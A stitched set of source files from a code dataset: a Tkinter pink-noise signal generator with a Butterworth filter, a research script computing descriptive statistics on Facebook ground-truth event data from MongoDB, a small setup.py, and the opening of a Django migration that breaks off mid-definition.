        self.hwtext1.grid(row=crow, column=0, columnspan=2, pady=10,sticky=tk.SW)
        crow=crow+1
        self.hwtext2=tk.Label(top,text='Std Dev')
        self.hwtext2.grid(row=crow, column=0, columnspan=1, pady=10,sticky=tk.SW)
        self.hwtext7=tk.Label(top,text='Band Limit?')
        self.hwtext7.grid(row=crow, column=1, columnspan=1, pady=10,sticky=tk.SW)
        crow=crow+1
        self.ampr=tk.StringVar()
        self.ampr.set('')
        self.amp_entry=tk.Entry(top, width = 10,textvariable=self.ampr)
        self.amp_entry.grid(row=crow, column=0,padx=10, pady=1,sticky=tk.NW)
        # yes/no listbox controlling whether a low-pass filter is applied.
        self.Lb1 = tk.Listbox(top,height=2,exportselection=0)
        self.Lb1.insert(1, "yes")
        self.Lb1.insert(2, "no")
        self.Lb1.grid(row=crow, column=1, padx=5, pady=1,sticky=tk.NW)
        self.Lb1.select_set(0)
        self.Lb1.bind('<<ListboxSelect>>',self.filter_option)
        crow=crow+1
        self.hwtext2=tk.Label(top,text='Duration (sec)')
        self.hwtext2.grid(row=crow, column=0, columnspan=1, pady=10,sticky=tk.SW)
        self.hwtext25=tk.Label(top,text='Low Pass Frequency (Hz)')
        self.hwtext25.grid(row=crow, column=1, columnspan=1, pady=10,sticky=tk.SW)
        crow=crow+1
        self.durr=tk.StringVar()
        self.durr.set('')
        self.dur_entry=tk.Entry(top, width = 10,textvariable=self.durr)
        self.dur_entry.grid(row=crow, column=0,padx=10, pady=1,sticky=tk.NW)
        self.lpfr=tk.StringVar()
        self.lpfr.set('')
        self.lpf_entry=tk.Entry(top, width = 10,textvariable=self.lpfr)
        self.lpf_entry.grid(row=crow, column=1,padx=10, pady=1,sticky=tk.NW)
        self.lpf_entry.config(state = 'normal')
        crow=crow+1
        self.hwtext4=tk.Label(top,text='Sample Rate (Hz)')
        self.hwtext4.grid(row=crow, column=0, columnspan=1, pady=10,sticky=tk.SW)
        crow=crow+1
        self.srr=tk.StringVar()
        self.srr.set('')
        self.sr=tk.Entry(top, width = 10,textvariable=self.srr)
        self.sr.grid(row=crow, column=0,padx=10, pady=1,sticky=tk.NW)
        crow=crow+1
        self.button_calculate = tk.Button(top, text="Calculate", command=self.calculation)
        self.button_calculate.config( height = 2, width = 12)
        self.button_calculate.grid(row=crow, column=0,columnspan=1, padx=10,pady=20)
        # Export stays disabled until a signal has been generated.
        self.button_ex = tk.Button(top, text="Export Data", command=self.export)
        self.button_ex.config( height = 2, width = 12,state = 'disabled' )
        self.button_ex.grid(row=crow, column=1,columnspan=1, padx=10,pady=3)
        root=self.master
        self.button_quit=tk.Button(top, text="Quit", command=lambda root=root:quit(root))
        self.button_quit.config( height = 2, width = 12 )
        self.button_quit.grid(row=crow, column=2,columnspan=1, padx=10,pady=20)

    def filter_option(self, val):
        """Enable/disable the low-pass frequency entry to match the
        yes/no listbox selection (index 0 = yes = band limit)."""
        sender=val.widget
        n= int(sender.curselection()[0])
        if(n==0):
            self.lpf_entry.config(state = 'normal')
        else:
            self.lpfr.set('')
            self.lpf_entry.config(state = 'disabled')

    ###############################################################################

    def calculation(self):
        """Generate the pink-noise time history and plot it.

        Reads sigma, duration, sample rate (and optionally the low-pass
        frequency) from the GUI, then: generate Gaussian white noise,
        FFT it, multiply by a 3/sqrt(s + 8*pi) shaping transfer function
        (mirrored for the negative-frequency half), inverse FFT, optionally
        low-pass filter, rescale to the requested standard deviation, and
        draw the time history and histogram figures.
        """
        n= int(self.Lb1.curselection()[0])
        sigma=float(self.ampr.get())
        sr=float(self.srr.get())
        dur=float(self.durr.get())
        dt=1./sr
        self.np=int(dur/dt)
        mu=0
        # Twice as many white-noise samples as needed; the result is
        # trimmed after the inverse FFT below.
        for i in range(0,int(2*self.np)):
            self.a.append(random.gauss(mu, sigma))
        self.z =fft(self.a)
        num=len(self.z)
        self.z/=float(num)
        epi=8*pi
        tpi=2*pi
        df=1./(num*dt);
        nh=int(num/2.)
        # H is the positive-frequency half of the shaping filter.
        # NOTE(review): the (i-1) term makes the first bin use a negative
        # frequency offset -- presumably intentional seeding of the DC
        # region; confirm against the original vibrationdata release.
        H=zeros(nh,complex128);
        for i in range(0,nh):
            s=(1j)*(i-1)*tpi*df
            H[i]=3/sqrt(s+epi)
#    print(H.dtype)
        nf=nh
        frf=zeros(num,complex128)
        frf_amp=zeros(num,complex128)
        A=zeros(num,complex128)
        frf[0:nf-1]=H[0:nf-1]
        # Mirror the conjugate response into the negative-frequency half.
        aa=H
        bb= flipud(aa)
        for i in range(0,nf):
            frf[i+nf]=bb[i].conjugate();
        nf=2*nf
        print(frf.dtype)
        frf_amp=flipud(frf)
#    print(frf_amp.dtype)
#    print(self.z.dtype)
#    print(A.dtype)
        # Apply the shaping filter in the frequency domain.
        for i in range(0,num):
            A[i]=frf_amp[i]*self.z[i]
        pink=ifft(A).real
        self.a=pink[1:self.np-1]
        length_a=len(self.a)
        for i in range(0,length_a):
            self.TT.append(i*dt)
        # Optional band limiting; the cutoff is capped at 0.3 * sample rate.
        if(n==0):
            self.lpf=float(self.lpfr.get())
            if(self.lpf>0.3*sr):
                self.lpf=0.3*sr
            self.a=vb_pink_noise.Butterworth_filter(self.TT,self.a,length_a,self.lpf,dt)
        print (" ")
        print ("Signal statistics")
        # Rescale so the output standard deviation matches the request.
        sd=std(self.a)
        self.a*=sigma/sd
        sr,dt,ave,sd,rms,skewness,kurtosis,dur=signal_stats(self.TT, self.a,length_a)
        plt.ion()
        plt.clf()
        plt.figure(1)
        plt.plot(self.TT, self.a, linewidth=1.0,color='b') # disregard error
        plt.grid(True)
        plt.xlabel('Time (sec)')
        plt.ylabel('Amp')
        plt.title('Pink Noise Time History')
        plt.draw()
        plt.figure(2)
        hist, bins = histogram(self.a, bins=21, density=False)
        width = 0.7*(bins[1]-bins[0])
        center = (bins[:-1]+bins[1:])/2
        plt.bar(center, hist, align = 'center', width = width)
        plt.ylabel('Counts')
        plt.xlabel('Amplitude')
        plt.title('Histogram')
        plt.draw()
        self.button_ex.config(state = 'normal' )

    @classmethod
    def Butterworth_filter(cls, ttime, y, np, f, dt):
        """Apply a sixth-order Butterworth low-pass filter to `y`.

        :param ttime: time axis (unused by the filter math itself).
        :param y: signal samples.
        :param np: number of points.
        :param f: cutoff frequency, Hz.
        :param dt: sample interval, sec.
        :return: the filtered signal.
        """
        l=6 # sixth-order
        a=zeros((4,4),'f')
        b=zeros((4,4),'f')
        s=(1+1j)*zeros(20,'f')
        ################################################################################
        a,b=vb_pink_noise.coefficients(a,b,dt,f,l,np,s)
        y=vb_pink_noise.apply(a,b,ttime,y)
        return y

    @classmethod
    def apply(cls, a, b, ttime, y):
        """Run the three cascaded biquad stages over the signal `y`."""
        ns=len(y)
        # cascade stage 1
        print("\n stage 1")
        ik=1
        yt=vb_pink_noise.stage1(ns,a,b,y,ik)
        # cascade stage 2
        print(" stage 2")
        ik=2
        y=vb_pink_noise.stage2(ns,a,b,yt,ik)
        # cascade stage 3
        print(" stage 3")
        ik=3
        yt=vb_pink_noise.stage1(ns,a,b,y,ik)
        y=yt
        # sd=std(y)
        return y

    @classmethod
    def stage1(cls, ns, a, b, y, ik):
        """Apply biquad stage `ik` (coefficients a[ik], b[ik]) to `y`."""
        yt=zeros(ns,'f')
        bc=b[ik][0:3]
        ac=a[ik][0:3]
        ac[0]=1
        yt=lfilter(bc, ac, y, axis=-1, zi=None)
        return yt

    @classmethod
    def stage2(cls, ns, a, b, yt, ik):
        """Same as stage1 (kept separate to mirror the cascade layout)."""
        y=zeros(ns,'f')
        bc=b[ik][0:3]
        ac=a[ik][0:3]
        ac[0]=1
        y=lfilter(bc, ac, yt, axis=-1, zi=None)
        return y

    @classmethod
    def coefficients(cls, a, b, dt, f, l, np, s):
        """Compute the digital Butterworth coefficient matrices a, b
        via the bilinear transform (frequency pre-warped with tan)."""
        #*** normalize the frequency ***
        targ=pi*f*dt # radians
        print (" targ = %8.4g " %targ)
        om=tan(targ)
        print (" om = %8.4g " %om)
        #*** solve for the poles *******
        a1,a2,a3,s=vb_pink_noise.poles(np,s,l,f)
        #*** solve for alpha values ****
        print("\n alpha ")
        alpha=zeros(2*l,'f')
        alpha=2*s.real
        ## for i in range(0,len(alpha)):
        ##     print (" %5.3f +j %5.3f " %(alpha[i].real,alpha[i].imag))
        #*** solve for filter coefficients **
        a,b=vb_pink_noise.lco(om,l,a,b,alpha)
        #*** plot digital transfer function **
        # dtrans();
        #*** check stability ****************
        vb_pink_noise.stab(l,a)
        return a,b

    @classmethod
    def lco(cls, om, l, a, b, alpha):
        """Fill the per-stage biquad coefficients from the warped
        frequency `om` and the pole-derived `alpha` values."""
        print ("lco")
        om2=om**2
        print (om2)
        print (alpha)
        for k in range(1,int((l/2)+1)):
            den = om2-alpha[k-1]*om+1.
            print (den)
            a[k][0]=0.
            a[k][1]=2.*(om2 -1.)/den
            a[k][2]=( om2 +alpha[k-1]*om+ 1.)/den
            b[k][0]=om2/den
            b[k][1]=2.*b[k][0]
            b[k][2]=b[k][0]
            print ("\n filter coefficients")
            print (" a[%i][1]=%10.5g a[%i][2]=%10.5g" %(k,a[k][1],k,a[k][2]))
            print (" b[%i][0]=%10.5g b[%i][1]=%10.5g b[%i][2]=%10.5g" %(k,b[k][0],k,b[k][1],k,b[k][2]))
        return a,b

    @classmethod
    def poles(cls, np, s, l, freq):
        """Place the analog Butterworth poles on the unit circle and
        evaluate the analog magnitude response along a frequency sweep."""
        arg=0
        a1=0
        a2=complex(0.,0.)
        h=complex(0.,0.)
        theta=complex(0.,0.)
        s=(1+1j)*zeros(20,'f')
        # print("\n calculate print ")
        print ("\n poles ")
        for k in range(0,int(2*l)):
            arg=(2.*(k+1) +l-1)*pi/(2.*l)
            s[k]=cos(arg)+sin(arg)*(1j)
            print (" %4.3f +j %4.3f " %(s[k].real,s[k].imag))
        for i in range(0,201):
            arg = i/40.
            h=complex( s[0].real,( arg - s[0].imag ))
            for j in range(1,int(l)):
                theta=complex( -s[j].real,( arg - s[j].imag ))
                temp=h*theta
                h=temp
            x=1/h
            h=x
            a1 = freq*arg
            a2=abs(h)
            a3 = a2**2
        return a1,a2,a3,s

    @classmethod
    def stab(cls, l, a):
        """Print a stability report for each biquad stage by checking the
        coefficients against the stability-triangle bounds."""
        a1=0
        d1=0
        d2=0
        d3=0
        dlit=0
        at1=0
        at2=0
        als=0.5e-06
        h2=0
        als*=6.
        print ("\n stability reference threshold= %14.7e " %als)
        for i in range(1,int((l/2)+1)):
            at1= -a[i][1]
            at2= -a[i][2]
            # print("\n\n stability coordinates: (%12.7g, %14.7g) ",at1,at2)
            h2=at2
            a1=h2-1.
            d3=at1-a1
            a1=1.-h2
            d2=a1-at1
            d1=at2+1.
            # print("\n d1=%14.5g d2=%14.5g d3=%14.5g",d1,d2,d3)
            # dlit is the smallest margin of the three triangle edges.
            dlit=d1
            if(dlit > d2):
                dlit=d2
            if(dlit > d3):
                dlit=d3
            print ("\n stage %ld dlit= %14.5g " %(i, dlit))
            if(dlit > als):
                print (" good stability")
            if( (dlit < als) and (dlit > 0.)):
                print(" marginally unstable ")
            if(dlit < 0.):
                print (" unstable ")
        print ("\n")

    ################################################################################

    def export(self):
        """Prompt for an output filename and write the generated time
        history (time, amplitude pairs) via WriteData2."""
        output_file_path = asksaveasfilename(parent=self.master,\
            title="Enter the output filename")
        output_file = output_file_path.rstrip('\n')
        self.np=len(self.TT)
        WriteData2(self.np,self.TT,self.a,output_file)
def quit(root):
    """Terminate the GUI by destroying the given Tk root window."""
    root.destroy()
"mortenopprudjakobsen@mortens-MacBook-Pro.local"
] | mortenopprudjakobsen@mortens-MacBook-Pro.local |
e28c6068b08233751108e44a68f3829d31617344 | 8229176ba618c08e23e47ca4b0a7c1ebeef4d994 | /src/DescriptiveStats.py | 6430639afb563b8258f98091b749e8a170eef2d0 | [] | no_license | benblamey/ben_phd_python | 703997daef090941b2e679dfee1cff78d475fa5f | 7518784270410e2afdb2adfebf97fa1f4286449f | refs/heads/master | 2021-05-04T11:09:21.582715 | 2017-09-18T20:43:32 | 2017-09-18T20:43:32 | 47,449,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,702 | py | from core import *
# Import Datum Types from CSV file
def do_descriptiveStats():
    """Compute and export descriptive statistics for the ground-truth data.

    Reads the datum-id -> datum-class mapping from DatumTypesForPython.csv,
    pulls each user's GROUND_TRUTH_EVENTS from the local MongoDB, then
    emits: summary LaTeX tables (via matrix2latex), bar charts of cluster
    sizes, a pie chart of cluster type composition, and intra-/inter-cluster
    datum-pair matrices. Figures are saved under `phd_output_dir`.

    NOTE(review): this function is Python-2 only as written -- it calls
    .append() on the result of zip() and .count() on a pymongo cursor
    collection, both of which fail on Python 3 / modern pymongo.
    Depends on star-imported names from `core` (data_dir, phd_output_dir,
    total_gt_datums, pylab plotting functions, Set, Counter, chain, ...).
    """
    global total_gt_datums
    # See: ExportGroundTruthDatumEventTypes in Java.
    # a table of the different kinds of datums was exported to CSV (for all user lifestories)
    # { ID : datum-classname }
    # all the datums -- not just the ground truth datums.
    datum_types = {}
    # Two strategies for life story selection:
    #- Use the latest life story always - recommended for most things - maximizes Ground truth data which "exists" in the life stories (38 missing vs. 104)
    #- Use the life story which matches the gold gate doc -this is the only strategy suitable for gold labelling text eval. */
    with open(data_dir + 'DatumTypesForPython.csv', 'r') as csvfile: # LATEST
        #- these are slightly older and contain slightly more datums!!!!!!!!!!!!!
        spamreader = csv.reader(csvfile, delimiter=',')
        for row in spamreader:
            datum_types[row[0]] = row[1]
    print(set(datum_types.values()))
    # Sanity check: CSV datum count should match the constant from core.py.
    if (len(set(datum_types.keys())) != total_gt_datums):
        print("Number of GT datums defined in core.py = " + str(total_gt_datums))
        print("Number of GT datums in DatumTypesForPython.csv = " + str(len(set(datum_types.keys()))))
        # raise Exception("gt datum count does not match")
    pp = pprint.PrettyPrinter(indent=4)
    client = pymongo.MongoClient("localhost", 27017) # previously using 1234 for tunnel.
    users = client.SocialWorld.users
    print("number of users: " + str(users.count()))
    # data is a nested list: users -> clusters -> (datum_id, datum_type).
    data = []
    excluded_datums = 0
    for user in users.find():
        print(user["FACEBOOK_USER_ID"])
        # Exclude non-participant accounts by Facebook user id.
        if (user[u"FACEBOOK_USER_ID"] == u"16457018212"):
            continue # Unknown randomer
        if (user[u"FACEBOOK_USER_ID"] == u"836555706"):
            continue # Muhamed Mustafa
        if (user[u"FACEBOOK_USER_ID"] == u"100005149806497"):
            continue # Felix Smith
        if "GROUND_TRUTH_EVENTS" in user:
            fullname = user[u"FACEBOOK_FIRST_NAME"] + user[u"FACEBOOK_LAST_NAME"]
            print("fullname: " + fullname) #.encode(sys.stdout.encoding, errors = 'replace'))
            usergts = user["GROUND_TRUTH_EVENTS"]
            data_user = []
            for gtec in usergts["events"]:
                data_user_datums = []
                # lookup the datum IDs in the dictionary
                # [3:] #strip off 'fb_' at the start
                for datum in gtec["datums"]:
                    datum_num_id = datum['id']
                    if (datum_num_id.startswith('fb_')):
                        datum_num_id = datum_num_id[3:]
                    # We exclude datums that are missing from the latest life story.
                    if (datum_num_id in datum_types):
                        datumtype = datum_types[datum_num_id]
                        data_user_datums.append((datum_num_id, datumtype))
                    else:
                        excluded_datums += 1
                if (len(data_user_datums) > 0):
                    data_user.append(data_user_datums)
            if (len(data_user)>0):
                data.append(data_user)
    # Summary table rows: (label, value) pairs rendered to LaTeX later.
    table_data = []
    table_data.append(("Participants", users.count()))
    table_data.append(("...who created ground truth event clusters",len(data)))
    table_data.append(("Total ground truth event clusters",
                       sum(len(user) for user in data)))
    table_data.append(("Mean clusters per user",
                       "{:.2f}".format(
                           float(sum(len(user) for user in data))/ # no of clusters
                           users.count()) # no of users
                       ))
    total_gt_datums_calc = len(list(chain.from_iterable(chain.from_iterable(data))))
    print("total_gt_datums: ")
    print(total_gt_datums)
    print("total_gt_datums_calc: ")
    print(total_gt_datums_calc) # GT datums from MongoDB
    assert(total_gt_datums == total_gt_datums_calc)
    table_data.append(("Total datums in ground truth clusters", total_gt_datums))
    table_data.append(("Mean datums per cluster",
                       "{:.2f}".format(
                           float(len(list(chain.from_iterable(chain.from_iterable(data))))) # total datums
                           /sum(len(user) for user in data) # total clusters
                           )
                       ))
    #print "List of Number of Ground Truth Event Clusters per User"
    number_of_gt_events_per_user = list(len(user_events) for user_events in data)
    #pp.pprint(number_of_gt_events_per_user)
    #print "List of Number of Datums per Ground Truth Event Cluster"
    number_of_datums_per_gt_event_cluster = [len(list(gt_cluster)) for gt_cluster in chain.from_iterable(data)]
    #pp.pprint(number_of_datums_per_gt_event_cluster)
    #table_data.append(("Total ground truth event clusters", total_gtecs))
    #table_data.append(("Total ground truth event cluster datums", total_gtecdatums))
    print("#### Excluded Datums: " + str(excluded_datums) + "####") # under latest=38,gold_or_latest=?
    pp.pprint(table_data)
    # Generate Data for Bar Chart
    # Frequency of Number of Ground Truth Event Clusters per User
    # =========
    gteventsizes = number_of_gt_events_per_user
    xvalues = range(1,max(gteventsizes)+1)
    # Histogram: index i-1 holds how many users have exactly i clusters.
    gt_events_per_user_graph_data = [0] * max(gteventsizes)
    print(xvalues)
    for (x,f) in Counter(gteventsizes).items():
        gt_events_per_user_graph_data[x-1] = f
    print(gt_events_per_user_graph_data )
    width = 1
    xlabels = range(0,max(gteventsizes)+2, 2)
    xlabels_positions = [x + 0.5 for x in xlabels]
    xminorformatter = FixedLocator([x - 0.5 for x in xlabels])
    bar(xvalues, gt_events_per_user_graph_data, width=width, linewidth=1)
    yticks(range(0, max(gt_events_per_user_graph_data)+2))
    xticks(xlabels_positions, xlabels)
    xlabel("# Ground Truth Events for User")
    ylabel("Frequency")
    xlim(0, max(xlabels)+1)
    # The function gca() returns the current axes - instance of http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes
    gca().get_xaxis().set_minor_locator(xminorformatter)
    gca().get_xaxis().tick_bottom()
    gca().get_yaxis().tick_left()
    savefig(phd_output_dir+"ch5_gen_freqGTusers.png", dpi=600, figsize=(8, 6))
    savefig(phd_output_dir+"ch5_gen_freqGTusers.pdf", dpi=600, figsize=(8, 6))
    #title("Frequency of Number of Ground Truth Event Clusters per User")
    # Frequency of Number of Datums per Ground Truth Event Cluster
    # ============================================================
    gtecsizes = number_of_datums_per_gt_event_cluster
    xvalues = range(1,max(gtecsizes)+1)
    datums_per_event_cluster_graph_data = [0] * max(gtecsizes)
    print(xvalues)
    for (x,f) in Counter(gtecsizes).items():
        datums_per_event_cluster_graph_data[x-1] = f
    print(datums_per_event_cluster_graph_data )
    #import numpy
    #xlocations = numpy.array(range(len(gteventsizes)))+0.5
    #xlocations = xlocations+ width/2 * 2
    #print xlocations
    width = 1
    xlabels = range(0,max(gtecsizes)+2, 2)
    xlabels_positions = [x + 0.5 for x in xlabels]
    xminorformatter = FixedLocator([x - 0.5 for x in xlabels])
    #print xlocations
    #import matplotlib.font_manager as font_manager
    #prop = font_manager.FontProperties(fname='C:/windows/fonts/cmunrm.ttf')
    #mpl.rcParams['font.family'] = prop.get_name()
    #font = {'family' : prop.get_name(),
    #    #'weight' : 'bold',
    #    #'size'   : 10
    #    }
    #rcParams['font.family'] = 'serif'
    # font.cursive: [u'Apple Chancery', u'Textile', u'Zapf Chancery', u'Sand', u'cursive']
    #font.family: [u'serif']
    #font.fantasy: [u'Comic Sans MS', u'Chicago', u'Charcoal', u'ImpactWestern', u'fantasy']
    #font.monospace: [u'Bitstream Vera Sans Mono', u'DejaVu Sans Mono', u'Andale Mono', u'Nimbus Mono L', u'Courier New', u'Courier', u'Fixed', u'Terminal', u'monospace']
    #font.sans-serif: [u'Bitstream Vera Sans', u'DejaVu Sans', u'Lucida Grande', u'Verdana', u'Geneva', u'Lucid', u'Arial', u'Helvetica', u'Avant Garde', u'sans-serif']
    #font.serif: [u'CMU Serif']
    #rcParams['font.fantasy'] = prop.get_name()
    #rcParams['font.monospace'] = prop.get_name()
    #rcParams['font.sans-serif'] = prop.get_name()
    #rcParams['font.serif'] = prop.get_name()
    #print rcParams
    bar(xvalues, datums_per_event_cluster_graph_data, width=width, linewidth=1)
    yticks(range(0, max(datums_per_event_cluster_graph_data)+10, 10))
    xticks(xlabels_positions, xlabels)
    xlim(0, max(xlabels)+1)
    xlabel("# Datums in Ground Truth Event Cluster")#, fontdict=font)
    ylabel("Frequency")
    # The function gca() returns the current axes - instance of http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes
    gca().get_xaxis().set_minor_locator(xminorformatter)
    gca().get_xaxis().tick_bottom()
    gca().get_yaxis().tick_left()
    savefig(phd_output_dir+"ch5_gen_freqGTevents.png", dpi=600, figsize=(8, 6))
    savefig(phd_output_dir+"ch5_gen_freqGTevents.pdf", dpi=600, figsize=(8, 6))
    #title("Frequency of Number of Datums per Ground Truth Event Cluster")
    # Types in GT Event Clusters
    # =======
    # In[6]:
    datum_type_counts = Counter()
    for user in data:
        for gt_event_cluster in user:
            for datum in gt_event_cluster:
                datum_type = datum[1]
                datum_type_counts[datum_type] += 1
    # Map Java datum class names to short human-readable labels.
    pretty_labels = {
        'benblamey.saesneg.model.datums.DatumPhoto': 'Photo',
        'benblamey.saesneg.model.datums.DatumStatusMessage': 'Status Message',
        'benblamey.saesneg.model.datums.DatumCheckin': 'Check-In',
        'benblamey.saesneg.model.datums.DatumEvent': 'Facebook Event',
        'mixed': '(Mixed)',
        }
    #t = sum(x_list)
    #cluster_type_comp_table_data = zip(label_list, x_list, [("{:.2f}".format(
    #    (float(x)/t) * 100) + "\%") # \% is for latex.
    #    for x in x_list ])
    label_list = [pretty_labels[key] for key in datum_type_counts.keys()]
    values = datum_type_counts.values()
    datum_type_table_data = zip(label_list, values)
    #cluster_type_comp_table_data = sorted(cluster_type_comp_table_data, key=lambda x: x[1], reverse=True) # %'s are strings! sort on col.2
    #cluster_type_comp_table_data.reverse()
    #print cluster_type_comp_table_data
    hr = ['Type','Frequency']
    # NOTE(review): zip() returns a list on Python 2 only; .append fails on 3.
    datum_type_table_data.append(("\midrule Total", sum(values)))
    t = matrix2latex.matrix2latex(datum_type_table_data,
                                  headerRow = hr,
                                  filename=phd_output_dir+'ch5_table_gen_datums_by_type',
                                  caption='Frequency of Datum by Type',
                                  alignment='r r')
    print(t)
    # In[7]:
    #Number of types in each gt event cluster
    types_in_gt_clusters = [set([datum[1] for datum in gt_event_cluster]) for gt_event_cluster in list(chain.from_iterable(data))]
    #pp.pprint(types_in_gt_clusters)
    # A cluster is labelled by its single datum type, or 'mixed'.
    gt_cluster_type_counter = Counter()
    for types in types_in_gt_clusters:
        if (len(types) == 1):
            type = next(iter(types))
        else:
            type = 'mixed'
        gt_cluster_type_counter[type] += 1
    pp.pprint(gt_cluster_type_counter)
    # In[8]:
    print(gt_cluster_type_counter.keys())
    label_list = [pretty_labels[label] for label in gt_cluster_type_counter.keys()]
    x_list = gt_cluster_type_counter.values()
    clf()
    axis("equal")
    pie(
        x_list,
        labels=label_list,
        autopct=None,
        #startangle=45
        #autopct="%1.1f%%",
        #pctdistance=0.8
        )
    #savefig(phd_output_dir+"ch5_gen_GTtypepie.png", dpi=600, figsize=(8, 6))
    savefig(phd_output_dir+"ch5_gen_GTtypepie.pdf", dpi=600, figsize=(8, 6))
    # In[9]:
    t = sum(x_list)
    cluster_type_comp_table_data = zip(label_list, x_list, [("{:.2f}".format(
        (float(x)/t) * 100) + "\%") # \% is for latex.
        for x in x_list ])
    cluster_type_comp_table_data = sorted(cluster_type_comp_table_data, key=lambda x: x[1], reverse=True) # %'s are strings! sort on col.2
    #cluster_type_comp_table_data.reverse()
    print(cluster_type_comp_table_data)
    hr = ['Type(s) in Event Cluster','Frequency','']
    cluster_type_comp_table_data.append(("\midrule Total", t, ""))
    t = matrix2latex.matrix2latex(cluster_type_comp_table_data,
                                  headerRow = hr,
                                  filename=phd_output_dir+'ch5_table_gen_gt_comp_by_type',
                                  caption='Ground Truth Cluster Datums by Type',
                                  alignment='r r r')
    print(t)
    # X-Type Matrix
    # ====
    # Postive/Intra Cases
    # Count ordered-by-type pairs of distinct datums inside the same cluster.
    cross_types_matrix = Counter()
    all_types = Set()
    for user in data:
        for gtec in user:
            for x in gtec:
                x_id = x[0]
                x_type = x[1]
                all_types.add(x_type)
                for y in gtec:
                    y_id = y[0]
                    y_type = y[1]
                    if (x_type > y_type):
                        continue
                    if (x_id == y_id):
                        continue
                    types = [x_type,y_type]
                    types.sort()
                    types = tuple(types)
                    cross_types_matrix[types] += 1
    pp.pprint (cross_types_matrix)
    print((all_types))
    # Negative/Inter Cases
    # Count pairs of datums in *different* clusters of the same user.
    inter_cross_types_matrix = Counter()
    for user in data:
        for cluster_x in user:
            for cluster_y in user:
                if (cluster_x == cluster_y): # this works.
                    continue
                for x_datum in cluster_x:
                    x_type = x_datum[1]
                    for y_datum in cluster_y:
                        y_type = y_datum[1]
                        if (x_type > y_type):
                            continue
                        types = [x_type,y_type]
                        types.sort()
                        types = tuple(types)
                        inter_cross_types_matrix[types] += 1
    # In[12]:
    all_types_sorted = list(all_types)
    all_types_sorted.sort()
    all_types_sorted_reversed = list(all_types_sorted)
    all_types_sorted_reversed.reverse()
    pair_table_data = []
    header_row = list(all_types_sorted)
    header_row = [pretty_labels[typestring] for typestring in header_row]
    header_row.insert(0,"")
    # Upper-triangular matrix of intra-cluster pair counts.
    xtype_table_data = [header_row]
    for t1 in all_types_sorted:
        table_row = [pretty_labels[t1]]
        for t2 in all_types_sorted:
            if (t1 <= t2):
                cell = cross_types_matrix[(t1, t2)]
            else:
                cell = "-"
            table_row.append(cell)
        xtype_table_data.append(table_row)
    matrix2latex.matrix2latex(xtype_table_data,
                              filename=phd_output_dir+"ch7_table_gen_intra_xtype_cluster",
                              caption="Intra-Cluster Datum Pairs by Type (Positive Cases).",
                              alignment='r ' * len(header_row))
    pair_table_data.append(
        ("Total intra-cluster (positive) datum pairs",
         sum(count for count in cross_types_matrix.values())))
    # Upper-triangular matrix of inter-cluster (negative) pair counts.
    inter_xtype_table_data = [header_row]
    for t1 in all_types_sorted:
        table_row = [pretty_labels[t1]]
        for t2 in all_types_sorted:
            if (t1 <= t2):
                cell = inter_cross_types_matrix[(t1, t2)]
            else:
                cell = "-"
            table_row.append(cell)
        inter_xtype_table_data.append(table_row)
    matrix2latex.matrix2latex(inter_xtype_table_data,
                              filename=phd_output_dir+"ch7_table_gen_inter_xtype_cluster",
                              caption="Inter-Cluster Datum Pairs by Type (Negative Cases).",
                              alignment='r ' * len(header_row))
    pair_table_data.append(
        ("Total inter-cluster (negative) datum pairs",
         sum(count for count in inter_cross_types_matrix.values())))
    # Combined (intra + inter) pair-count matrix.
    inter_xtype_table_data = [header_row]
    for t1 in all_types_sorted:
        table_row = [pretty_labels[t1]]
        for t2 in all_types_sorted:
            if (t1 <= t2):
                cell = inter_cross_types_matrix[(t1, t2)] + cross_types_matrix[(t1, t2)]
            else:
                cell = "-"
            table_row.append(cell)
        inter_xtype_table_data.append(table_row)
    matrix2latex.matrix2latex(inter_xtype_table_data,
                              filename=phd_output_dir+"ch7_table_gen_all_xtype_cluster",
                              caption="Cluster Datum Pairs by Type (All Cases).",
                              alignment='r ' * len(header_row))
    pair_table_data.append(
        ("\midrule Total cluster datum pairs",
         sum(count for count in inter_cross_types_matrix.values())
         + sum(count for count in cross_types_matrix.values())))
    # Generate Overview Stats Table
    # ====
    # In[13]:
    t = matrix2latex.matrix2latex(table_data, filename=phd_output_dir+"ch5_table_gen_gt_summary", caption="Summary of participants' ground truth data.", alignment='r r')
    print(t)
    # In[14]:
    t = matrix2latex.matrix2latex(pair_table_data,
                                  filename=phd_output_dir+'ch7_table_pair_summary',
                                  caption='Summary of Ground Truth Datum Pairs.',
                                  alignment='r r')
    print(t)
| [
"blamey.ben@gmail.com"
] | blamey.ben@gmail.com |
4e807ffc55a08ee93c326f17f8af5422fe962403 | e940d45bb3af60d90371ea3721a93d892778be8e | /setup.py | 06f1a0b76ed3c6c47986cf191ddecabc0510aab7 | [] | no_license | jmartens/fail2map | 0905191a4b8fc6a22ace59c72a02b0a2d88f123a | 8c9e6f04e39a3cc138dc88168d65d3bfecb8a836 | refs/heads/master | 2022-12-05T03:39:20.035771 | 2022-11-19T09:35:30 | 2022-11-19T09:35:30 | 204,539,431 | 0 | 1 | null | 2022-11-19T09:35:31 | 2019-08-26T18:46:01 | Python | UTF-8 | Python | false | false | 290 | py | from setuptools import setup, find_packages
# Package metadata and build configuration for the fail2map CLI tool.
setup(
    name='fail2map',
    version='0.1',
    # Auto-discover all importable packages in the project tree.
    packages=find_packages(),
    include_package_data=True,
    install_requires=[
        'Click',
    ],
    # Install a `fail2map` console command that dispatches to scripts.cli:cli.
    entry_points='''
        [console_scripts]
        fail2map=scripts.cli:cli
    ''',
)
"jonathan@snetram.nl"
] | jonathan@snetram.nl |
7e51c318ad5eaadbc941369304e8d88bd41bbca3 | 30556827b68e9241c6e4045668158809b4bc9670 | /medicar/specialties/migrations/0001_initial.py | 8f85efdd77d63e62c2e25494e5e76253ed34fd0c | [] | no_license | gabrielloliveira/medicar | 434ea47a5ebde2e797522ffd3b86b67c46de96f5 | 4b6e7d38d2ad569d1ca087a4a7f6e2c1ee0feedf | refs/heads/main | 2023-08-25T03:50:35.035474 | 2021-09-16T21:54:47 | 2021-09-16T21:54:47 | 406,541,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | # Generated by Django 3.2.7 on 2021-09-14 23:42
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    # Initial schema migration for the specialties app: creates the
    # Specialty table with audit timestamps, a unique UUID, and a name.

    initial = True

    # No prior migrations to depend on.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Specialty',
            fields=[
